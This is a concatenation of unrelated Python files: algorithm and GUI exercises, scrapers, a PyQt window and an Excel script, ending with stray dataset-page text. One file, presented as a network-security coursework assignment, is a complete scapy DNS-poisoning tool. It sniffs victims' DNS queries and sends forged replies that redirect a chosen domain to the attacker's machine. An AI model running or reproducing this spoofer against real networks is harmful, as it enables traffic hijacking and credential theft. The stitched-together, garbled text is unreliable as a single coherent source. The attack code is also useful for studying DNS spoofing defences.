        for idx, ch in enumerate(s):
            if ch not in need:
                continue
            positions[ch].append(idx)
            if need[ch] < len(positions[ch]):
                positions[ch].popleft()
            # Until a first full window exists, verify coverage before scoring.
            if width == len(s) + 1 and any(need[c] > len(positions[c]) for c in need):
                continue
            start = min(positions[c][0] for c in need)
            end = max(positions[c][-1] for c in need) + 1
            if end - start < width:
                lo, hi, width = start, end, end - start
        return s[lo:hi] if width != len(s) + 1 else ""
if __name__ == "__main__":
    # Smoke tests: standard case, exact match, impossible, and duplicates.
    solution = Solution()
    assert "BANC" == solution.minWindow("ADOBECODEBANC", "ABC")
    assert "aa" == solution.minWindow("aa", "aa")
    assert "" == solution.minWindow("a", "b")
    assert "cwae" == solution.minWindow("cabwefgewcwaefgcf", "cae")
|
from tkinter import *
import math
# Root window and the display entry spanning the three button columns.
root = Tk()
root.title("calculator")
e = Entry(root,width = 35,borderwidth = 5)
e.grid(row = 0,column = 0,columnspan = 3,padx = 10,pady=10)
def button_click(number):
    """Append ``number`` to whatever is currently shown in the display."""
    existing = e.get()
    e.delete(0, END)
    e.insert(0, f"{existing}{number}")
def button_clear():
    """Wipe the display."""
    e.delete(0,END)
def button_add():
    """Store the first operand and select addition.

    NOTE(review): the global name ``math`` shadows the imported math module
    (kept for consistency with the other operator handlers).
    """
    global f_num, math
    math = "addition"
    f_num = int(e.get())
    e.delete(0, END)
def button_equal():
    """Apply the pending operation to the stored and displayed operands."""
    operand = e.get()
    e.delete(0, END)
    # ``math`` (set by the operator buttons) names the pending operation.
    if math == "addition":
        e.insert(0, f_num + int(operand))
    elif math == "subtraction":
        e.insert(0, f_num - int(operand))
    elif math == "multiplication":
        e.insert(0, f_num * int(operand))
    elif math == "division":
        e.insert(0, f_num / int(operand))
def button_subtract():
    """Store the first operand and select subtraction."""
    global f_num, math
    math = "subtraction"
    f_num = int(e.get())
    e.delete(0, END)
def button_multiply():
    """Store the first operand and select multiplication."""
    global f_num, math
    math = "multiplication"
    f_num = int(e.get())
    e.delete(0, END)
def button_divide():
    """Store the first operand and select division."""
    global f_num, math
    math = "division"
    f_num = int(e.get())
    e.delete(0, END)
# --- Button construction --------------------------------------------------
# NOTE(review): the handler functions are captured by command= first, then
# the same names (button_add etc.) are rebound to the Button widgets — this
# works, but the functions become unreachable by name afterwards.
button_1 = Button(root,text = "1", padx=40,pady=20,command =lambda:button_click(1))
button_2 = Button(root,text = "2", padx=40,pady=20,command=lambda:button_click(2))
button_3 = Button(root,text = "3", padx=40,pady=20,command=lambda:button_click(3))
button_4 = Button(root,text = "4", padx=40,pady=20,command=lambda:button_click(4))
button_5 = Button(root,text = "5", padx=40,pady=20,command=lambda:button_click(5))
button_6 = Button(root,text = "6", padx=40,pady=20,command=lambda:button_click(6))
button_7 = Button(root,text = "7", padx=40,pady=20,command=lambda:button_click(7))
button_8 = Button(root,text = "8", padx=40,pady=20,command=lambda:button_click(8))
button_9 = Button(root,text = "9", padx=40,pady=20,command=lambda:button_click(9))
button_0 = Button(root,text = "0", padx=40,pady=20,command=lambda:button_click(0))
# NOTE(review): fractional padx values (87.4, 73.7) are passed to Tk as-is —
# confirm they render as intended on all platforms.
button_add = Button(root,text="+",padx=39,pady=20,command =button_add)
button_equal = Button(root,text="=",padx=87.4,pady=20,command =button_equal)
button_clear = Button(root,text="CLEAR",padx=73.7,pady=20,command =button_clear)
button_subtract = Button(root,text= "-",padx=41,pady=21,command=button_subtract)
button_multiply = Button(root,text= "*",padx=40,pady=21,command=button_multiply)
button_divide = Button(root,text= "/",padx=41,pady=21,command=button_divide)
# --- Grid layout ----------------------------------------------------------
button_1.grid(row=3,column=0)
button_2.grid(row=3,column=1)
button_3.grid(row=3,column=2)
button_4.grid(row=2,column=0)
button_5.grid(row=2,column=1)
button_6.grid(row=2,column=2)
button_7.grid(row=1,column=0)
button_8.grid(row=1,column=1)
button_9.grid(row=1,column=2)
button_0.grid(row=4,column=0)
button_clear.grid(row = 4, column=1,columnspan =2)
button_equal.grid(row=5,column = 1,columnspan=2)
button_add.grid(row = 5,column=0)
# NOTE(review): button_multiply spans columns 0-2 of row 6, overlapping the
# divide (col 0) and subtract (col 2) cells — verify the intended layout.
button_subtract.grid(row=6,column=2)
button_multiply.grid(row=6,columnspan=3)
button_divide.grid(row=6,column=0)
root.mainloop()
|
def lenIter(aStr):
    """Count the characters of ``aStr`` by iteration.

    Bug fix: the original lower-cased the string first, which can change the
    length for some Unicode characters (e.g. 'İ'.lower() has length 2); case
    is irrelevant to a character count, so the input is counted directly.
    """
    count = 0
    for _ in aStr:
        count += 1
    return count
print(lenIter('svcd'))
|
from core.web import Web
from core.view import View
# Start-up wiring: bind the web server to localhost:8000 and create the view.
web = Web('127.0.0.1', 8000)
view = View()
|
"""
Python Version 3.8
Singapore Institute of Technology (SIT)
Information and Communications Technology (Information Security), BEng (Hons)
ICT-2203 Network Security Assignment 1
Author: @ Clement Chin / 1802951
Academic Year: 2020/2021
Lecturer: Woo Wing Keong
Submission Date: 25th October 2020
This script holds the code to perform DNS poisoning.
> Allows all normal traffic to pass through, acting as a man in the middle forwarding all DNS packets
> Once a user requests a URL matching MALICIOUS_SITE, he/she will be redirected to MALICIOUS_IP
"""
import logging
from scapy.all import *
# Sniffing interface and DNS qr-flag constants.
IFACE = conf.iface
QUERY = 0       # DNS qr flag: query
RESPONSE = 1    # DNS qr flag: response
MY_IP = get_if_addr(IFACE)
# Server Flags
DNS_SERVER = "8.8.8.8"  # upstream resolver used for legitimate lookups
# Attacker Flags
MALICIOUS_SITE = b"secret.companyxyz.com."  # qname to hijack (bytes, trailing dot)
MALICIOUS_IP = MY_IP                        # address victims get redirected to
# Logging Configuration
LOG_FILE_DIR = os.path.abspath("logs/dns_poison.txt")
logging.basicConfig(filename=LOG_FILE_DIR,
                    filemode='w',
                    level=logging.DEBUG,
                    format='%(asctime)s %(message)s',
                    datefmt='%d/%m/%Y %I:%M:%S %p')
def dns_pkt_filter(pkt):
    """Sniff predicate: True only for DNS queries addressed to this host.

    Bug fix: the original ended in a bare ``except: pass``, returning None
    (and swallowing even KeyboardInterrupt); malformed / non-IP packets now
    explicitly return False.
    """
    try:
        if pkt[IP].dst == MY_IP and pkt.haslayer(DNS):
            return pkt[UDP].dport == 53 and pkt[DNS].qr == QUERY
        return False
    except (IndexError, AttributeError):
        # Packet lacks the expected layers: not a DNS query of interest.
        return False
def dns_reply(pkt):
    """Answer an intercepted DNS query.

    Normal queries are resolved through DNS_SERVER and the genuine answer is
    relayed; queries for MALICIOUS_SITE are answered with MALICIOUS_IP.
    """
    try:
        # DNS question name being resolved (bytes, trailing dot).
        qname = pkt[DNSQR].qname
        # Let user browse through normal traffic
        if qname != MALICIOUS_SITE:
            dns_req = IP(dst=DNS_SERVER) \
                / UDP(dport=53) \
                / DNS(rd=1, qd=DNSQR(qname=qname))
            ans = sr1(dns_req, verbose=0)
            domain_ip = ans[DNSRR].rdata
        # User tries to access the site we want to spoof
        else:
            domain_ip = MALICIOUS_IP
            logging.info(f"[*] Redirecting {pkt[IP].src} to {MALICIOUS_IP}")
        # Craft the Spoofed DNS Packet (mirroring the query's id and ports)
        # and send it back to the requesting client.
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
            / UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) \
            / DNS(id=pkt[DNS].id,
                  qr=RESPONSE,
                  qd=pkt[DNS].qd,
                  an=DNSRR(rrname=qname, type='A', ttl=124, rdata=domain_ip),
                  ancount=1)
        send(spoofed_pkt, verbose=0)
        logging.info(f"[*] Resolve {qname} for Client: {pkt[IP].src}")
    except Exception:
        # Best-effort forwarder: the original silently swallowed every error
        # with a bare except; log at debug level and keep sniffing.
        logging.debug("dns_reply failed for a packet", exc_info=True)
def main():
    """Sniff DNS queries on IFACE and answer each via dns_reply.

    (Fixes the "Posioning" typo in the start-up log message.)
    """
    logging.info("[*] Starting DNS Poisoning ...")
    sniff(lfilter=dns_pkt_filter, prn=dns_reply, iface=IFACE)
if __name__ == '__main__':
    main()
from crawlers.spiders.squawka import SquawkaSpider
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from squawka import utils
import json
import subprocess
# Squawka competition ids to scrape for each season.
COMPETITION_IDS = [8, 5, 6, 9, 21, 22, 23, 24]
def load_json(file_name):
    """Read and return the JSON document stored in ``file_name``."""
    with open(file_name) as handle:
        return json.load(handle)
def write_json(file_name, json_data):
    """Serialize ``json_data`` to ``file_name`` and return it unchanged."""
    with open(file_name, 'w') as sink:
        json.dump(json_data, sink)
    return json_data
# Resume state: list of [competition_id, year] pairs already fetched.
downloaded = load_json('downloaded.json')
# Walk seasons newest-first, skipping pairs already downloaded.
for year in range(2017, 2008, -1):
    for competition_id in COMPETITION_IDS:
        if [competition_id, year] in downloaded:
            print year, utils.COMPETITIONS[competition_id], 'downloaded'
            continue
        print year, utils.COMPETITIONS[competition_id], 'start'
        # NOTE(review): CrawlerProcess.start() blocks on the Twisted reactor,
        # which cannot be restarted in the same process — a second iteration
        # will likely raise ReactorNotRestartable (presumably why the
        # subprocess variant below was kept). Confirm before relying on
        # multiple iterations per run.
        process = CrawlerProcess(get_project_settings())
        process.crawl(
            SquawkaSpider, competition_id=competition_id, season=year)
        process.start()
        # cmd = [
        #     "scrapy", "crawl squawka -a competition_id=" + str(competition_id)
        #     + " -a season=" + str(year)
        # ]
        # process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
        # process.wait()
        # print process.returncode
        print year, utils.COMPETITIONS[competition_id], 'end'
        # Persist progress after every successful crawl.
        downloaded.append([competition_id, year])
        write_json('downloaded.json', downloaded)
|
def sumar(number1, number2=20):
    # Print both operands and their sum (Python 2 print statements).
    print number1 # 15 for the call below
    print number2 # 10 for the call below
    print number1 + number2
# Keyword arguments may be passed in any order; prints 15, 10, 25.
sumar(number2=10, number1=15)
import sys
from urllib2 import urlopen
from json import loads
def dict_recurse(data, search, results=None):
    """Collect every value stored under key ``search`` anywhere inside a
    nested structure of dicts, lists and tuples.

    Values found under a matching key are added but not descended into,
    matching the original recursive behavior.
    """
    results = set() if results is None else results
    # Iterative traversal with an explicit work stack instead of recursion.
    pending = [data]
    while pending:
        node = pending.pop()
        if isinstance(node, dict):
            for key, value in node.items():
                if key == search:
                    results.add(value)
                else:
                    pending.append(value)
        elif isinstance(node, (list, tuple)):
            pending.extend(node)
    return results
def get_hrefs(url, seen=set()):
    # Fetch ``url`` (expected to return JSON), collect every 'href' value in
    # the response, and return the ones not crawled yet.
    # NOTE(review): the mutable default ``seen`` is shared across calls — the
    # crawl loop below relies on it as a persistent visited-set. Apparently
    # intentional, but fragile; confirm before refactoring.
    if url in seen:
        return []
    print url
    seen.add(url)
    data = loads(urlopen(url, timeout=5).read())
    hrefs = dict_recurse(data, 'href')
    return [href for href in hrefs if href not in seen]
# Breadth-first crawl starting from argv[1] (or a local default endpoint).
hrefs = [sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080/api/v1/index']
while hrefs:
    new = set()
    # Python 2 ``map`` is eager, so the fetch side effects run immediately
    # (in Python 3 this lazy map would do nothing).
    map(new.update, map(get_hrefs, hrefs))
    hrefs = new
|
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QStatusBar, QMainWindow, QApplication, QWidget,QHBoxLayout, qApp, QVBoxLayout, QPushButton, QSlider, QLCDNumber, QLabel, QAction
from PyQt5.QtGui import QIcon
class MyMainWindow(QMainWindow):
    """Main application window: menu bar, status bar and a central widget."""
    def __init__(self, parent=None):
        super().__init__()
        self.main_widget = FormWidget(self)
        self.setCentralWidget(self.main_widget)
        self.init_UI()
    def _make_action(self, text, shortcut, status_tip):
        """Build a QAction with the shared icon, a shortcut and a status tip."""
        action = QAction(QIcon('exit.png'), text, self)
        action.setShortcut(shortcut)
        action.setStatusTip(status_tip)
        return action
    def init_UI(self):
        """Create menus, the status bar and the window geometry.

        Fixes over the original:
        - every action's status tip was the copy-pasted 'Exit application';
        - geometry/title were set and show() called twice in a row.
        NOTE(review): all reference actions still share the Ctrl+S shortcut,
        which Qt treats as ambiguous — kept as in the original; confirm.
        """
        exitAction = self._make_action('&Выход', 'Ctrl+Q', 'Exit application')
        exitAction.triggered.connect(qApp.quit)
        sourceAction = self._make_action('&Источники', 'Ctrl+S', 'Sources')
        statusAction = self._make_action('&Статус', 'Ctrl+S', 'Status')
        sellerAction = self._make_action('&Контрагент', 'Ctrl+S', 'Counterparty')
        kosguAction = self._make_action('&КОСГУ', 'Ctrl+S', 'KOSGU')
        yearAction = self._make_action('&Год', 'Ctrl+S', 'Year')
        methodAction = self._make_action('&Метод', 'Ctrl+S', 'Method')
        typesAction = self._make_action('&Тип', 'Ctrl+S', 'Type')
        menubar = self.menuBar()
        fileMenu = menubar.addMenu('&Файл')
        fileMenu.addAction(exitAction)
        libMenu = menubar.addMenu('&Справочники')
        for action in (statusAction, sourceAction, sellerAction, kosguAction,
                       yearAction, methodAction, typesAction):
            libMenu.addAction(action)
        self.statusbar = self.statusBar()
        self.statusbar.showMessage('Ready')
        self.setGeometry(200, 100, 300, 300)
        self.setWindowTitle('Central Widget')
        self.show()
class FormWidget(QWidget):
    """Central widget with two buttons that report clicks to the status bar."""
    def __init__(self, parent):
        super(FormWidget, self).__init__(parent)
        self.parent = parent
        self.init_UI()
    def init_UI(self):
        """Lay the two buttons out horizontally and show the widget."""
        layout = QHBoxLayout()
        for label in ('Button 1', 'Button 2'):
            button = QPushButton(label, self)
            button.clicked.connect(self.buttonClicked)
            layout.addWidget(button)
        self.setLayout(layout)
        self.setGeometry(200, 100, 300, 300)
        self.setWindowTitle('Slider and LCD')
        self.show()
    def buttonClicked(self):
        """Show which button fired this slot in the parent's status bar."""
        source = self.sender()
        self.parent.statusbar.showMessage(source.text() + ' was clicked')
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the window, run the loop.
    APP = QApplication(sys.argv)
    ex = MyMainWindow()
    sys.exit(APP.exec_())
|
# Count the vowels in a fixed phrase using a generator expression.
frase = 'linux open software specialists'
vogais = 'aeiou'
conta_vogais = sum(1 for letra in frase if letra in vogais)
print('A frase tem', conta_vogais, 'vogais')
# Stop here; everything below is disabled example code.
exit()
# NOTE(review): the block below is example code disabled by wrapping it in a
# string literal; it contains errors (print(ruta), for_each) and is never
# executed because of the exit() call above. Kept verbatim.
'''
frutas = ['Bana', 'Cajú', 'Laranja'
, 'Abacate']
for fruta in frutas:
print(ruta)
exit()
for number in range(1, 10):
print(number)
exit()
for numero in range(2, 40, 4):
if numero % 2 == 0:
print(numero)
exit()
frutas = ['Bana', 'Cajú', 'Laranja', 'Abacate']
for_each fruta in frutas:
print(each_fruta)
'''
|
#coding:utf8
# Python's roles here (translated): 1) a tooling layer driving Excel features,
# 2) data processing / interchange, 3) an analysis engine replacing VBA.
# NOTE(review): the bare `print` statements and string.uppercase below pin
# this script to Python 2.
import xlrd,xlwt
import pandas as pd
import numpy as np
import xlsxwriter
#
# Base directory for all workbook files.
path='./data/'
# --- Disabled xlwt example (kept verbatim) --------------------------------
# wb=xlwt.Workbook()
#
# wb.add_sheet('first_sheet',cell_overwrite_ok=True)
#
# ws_1=wb.get_sheet(0)
#
# ws_2=wb.add_sheet('second_sheet')
#
# data=np.arange(1,65).reshape(8,8)
#
#
#
# values=np.random.standard_normal(15).cumsum()
# ws_1.write(0,0,100)
# wb.save(path+'workbook2.xls')
# --- Disabled xlsxwriter example (kept verbatim) --------------------------
# import xlrd,xlwt
# import pandas as pd
# import numpy as np
# import xlsxwriter
#
# path='./data/'
#
# wb=xlsxwriter.Workbook()
#
# wb.add_worksheet('first_sheet',cell_overwrite_ok=True)
#
# ws_1=wb.get_sheet(0)
#
#
#
# data=np.arange(1,65).reshape(8,8)
#
#
#
# values=np.random.standard_normal(15).cumsum()
# ws_1.write(0,0,100)
# ws_1.write_colum('a1',values)
# wb.save(path+'workbook2.xls')
# --- pandas interaction ---------------------------------------------------
data=np.random.standard_normal((8,8)).round(5)
df_1=pd.read_excel(path+'workbook2.xls','first_sheet',header=None)
df_2=pd.read_excel(path+'workbook2.xls','second_sheet',header=None)
import string
columns= []
for c in range(8):
    # string.uppercase is Python 2 only (ascii_uppercase in Python 3).
    columns.append(string.uppercase[c])
print df_1
df_1.columns=columns
print df_1
df_1.to_excel(path+'newbookwork.xlsx','mysheet')
# Read the written workbook back as a check (xlrd).
wbn=xlrd.open_workbook(path+'newbookwork.xlsx')
print wbn.sheet_names()
# Scripting Excel with datanitro as a VBA replacement (translated comment).
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.